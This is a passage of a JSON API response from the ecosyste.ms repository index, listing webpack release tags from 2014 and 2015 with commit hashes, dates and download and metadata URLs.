ebpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746